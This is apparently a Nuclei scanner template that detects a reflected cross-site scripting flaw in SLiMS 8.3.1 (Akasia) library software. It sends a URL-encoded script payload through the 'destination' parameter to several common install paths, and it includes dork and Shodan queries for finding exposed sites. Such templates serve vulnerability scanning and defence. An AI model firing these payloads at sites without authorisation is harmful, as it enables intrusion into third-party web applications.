id: slims-8-akasia-xss info: name: Senayan Library Management System v8.3.1 (Akasia) - Cross-Site Scripting author: nblirwn severity: medium description: | SLiMS 8.3.1 (Akasia) has a `destination` parameter that is vulnerable to reflected XSS. However, ensure that the `p` parameter points to the 'member'. Additional google dork 'intext:"SLiMS 8.3.1 (Akasia)"'. reference: - https://github.com/slims/slims8_akasia/issues/184 metadata: verified: true max-request: 1 vendor: slims product: senayan_library_management_system shodan-query: html:"SLIMS" tags: senayan,xss,slims http: - method: GET path: - "{{BaseURL}}/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/perpustakaan/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/perpustakaan/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/e-library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/perpus/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/digilib/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/akasia/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" - "{{BaseURL}}/library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '' - 'SLiMS' condition: and - type: word part: content_type words: - "text/html" - type: status status: - 200 # digest: 490a00463044022030228d3be6612bc552ec2c43aaebd736821dcdfb321a6624a54c1f11dc80965002204b96d99b541f1bb3435ef5c008b58149227b4f97a09600654b98c57806baab5f:922c64590222798bb761d5b6d8e72950